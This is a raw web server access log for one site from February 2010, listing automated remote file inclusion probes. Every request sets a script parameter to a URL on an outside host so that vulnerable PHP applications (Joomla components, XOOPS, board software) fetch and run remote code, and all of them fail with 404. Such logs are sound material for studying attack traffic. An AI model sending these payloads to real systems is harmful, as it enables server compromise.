91.121.105.125 - - [14/Feb/2010:06:19:34 -0800] "GET /logs/access_100125.log/search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:34 -0800] "GET /logs/search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:40 -0800] "GET /search.php?include_dir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:40 -0800] "GET /logs/access_100125.log%20%20/search.php?include_dir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:40 -0800] "GET /logs/search.php?include_dir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:44 -0800] "GET /search.php?include_dir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:44 -0800] "GET /logs/access_100125.log%20%20/search.php?include_dir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:44 -0800] "GET /logs/search.php?include_dir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:46 -0800] "GET /logs/access_100125.log%20%20/search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:46 -0800] "GET /search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:46 -0800] "GET /logs/search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:52 -0800] "GET /search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:52 -0800] "GET /logs/access_100125.log%20%20/search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:52 -0800] "GET /logs/search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:52 -0800] "GET /search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:52 -0800] "GET /logs/access_100125.log%20%20/search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:52 -0800] "GET /logs/search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:53 -0800] "GET /logs/search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:53 -0800] "GET /search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:53 -0800] "GET /logs/access_100125.log%20%20/search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:06:19:56 -0800] "GET /search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:06:19:56 -0800] "GET /logs/access_100125.log/search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:06:19:56 -0800] "GET /logs/search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:21:46 -0800] "GET /logs/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:21:46 -0800] "GET /error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:21:46 -0800] "GET /logs/access_100118.log%20%20/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:21:56 -0800] "GET /logs/access_100119.log%20%20/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:06:22:17 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:06:22:17 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:06:22:17 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:06:22:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:06:22:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:06:22:22 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:06:22:49 -0800] "GET /logs/access_100125.log%20%20/search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:06:22:50 -0800] "GET /search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:06:22:50 -0800] "GET /logs/search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:22:51 -0800] "GET /logs/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:22:51 -0800] "GET /error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:22:51 -0800] "GET /logs/access_100118.log%20%20/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:23:01 -0800] "GET /logs/access_100119.log%20%20/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:06:23:28 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:06:23:30 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:23:42 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:23:42 -0800] "GET /logs//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:23:42 -0800] "GET /delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:23:47 -0800] "GET /error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:23:47 -0800] "GET /logs/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:23:48 -0800] "GET /logs/access_100118.log%20%20/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:23:59 -0800] "GET /logs/access_100119.log%20%20/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:24:14 -0800] "GET /logs/access_100210.log%20%20//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:25:23 -0800] "GET /error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:25:23 -0800] "GET /logs/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:25:24 -0800] "GET /logs/access_100118.log%20%20/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:25:42 -0800] "GET /logs/access_100119.log%20%20/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:06:25:45 -0800] "GET /logs/access.log//ammember///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:26:30 -0800] "GET /error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:26:30 -0800] "GET /logs/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:26:31 -0800] "GET /logs/access_100118.log%20%20/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:26:41 -0800] "GET /logs/access_100119.log%20%20/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:06:27:15 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:06:27:15 -0800] "GET /logs/access_100128.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:06:27:15 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:28:10 -0800] "GET /error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:28:11 -0800] "GET /logs/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:28:11 -0800] "GET /logs/access_100118.log%20%20/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [14/Feb/2010:06:28:24 -0800] "GET /logs/access_100119.log%20%20/error.php?dir=http://rainera.50webs.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:06:28:45 -0800] "GET /logs/access_100202.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [14/Feb/2010:06:29:57 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
194.249.18.67 - - [14/Feb/2010:06:29:57 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:38:50 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:38:50 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:38:50 -0800] "GET /logs/access_100112.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:39:07 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:39:07 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:39:07 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:39:18 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:39:18 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:39:18 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.238.67 - - [14/Feb/2010:06:39:21 -0800] "GET //skin/ggambo7002_board/write.php?dir=http://www.labottevini.com/site/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.238.67 - - [14/Feb/2010:06:39:21 -0800] "GET /logs///skin/ggambo7002_board/write.php?dir=http://www.labottevini.com/site/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.238.67 - - [14/Feb/2010:06:39:21 -0800] "GET /logs/access_100126.log%20%20///skin/ggambo7002_board/write.php?dir=http://www.labottevini.com/site/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.238.67 - - [14/Feb/2010:06:39:26 -0800] "GET /logs/access_100109.log%20%20///skin/ggambo7002_board/write.php?dir=http://www.labottevini.com/site/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:39:28 -0800] "GET /logs/access_100107.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:39:28 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:39:28 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:39:28 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:39:28 -0800] "GET /logs/access_100112.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:39:28 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:39:28 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:39:28 -0800] "GET /logs/access_100107.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:39:29 -0800] "GET /logs//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:39:29 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:39:29 -0800] "GET /delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:39:34 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:39:34 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:39:35 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:39:36 -0800] "GET /logs/access_100107.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:39:55 -0800] "GET /logs/access_100210.log%20%20//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:39:58 -0800] "GET /logs/access_100107.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:39:58 -0800] "GET /logs/access_100107.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:06:40:11 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:06:40:11 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:06:40:11 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:06:40:11 -0800] "GET /logs/access_100107.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:06:40:13 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:06:40:13 -0800] "GET /logs/access_100107.log//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:06:40:13 -0800] "GET /logs/access_100105.log//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:06:40:13 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:40:33 -0800] "GET /logs/access_100112.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:40:33 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:40:33 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:40:37 -0800] "GET /logs/access_100107.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:40:58 -0800] "GET /delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:40:58 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:40:58 -0800] "GET /logs//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:41:01 -0800] "GET /logs//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:41:01 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:41:01 -0800] "GET /delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:41:11 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:41:11 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:42:27 -0800] "GET /logs/access_100112.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:42:27 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:42:27 -0800] "GET /logs/access_100107.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:42:30 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:42:38 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:42:38 -0800] "GET /logs/access_100107.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:06:42:49 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
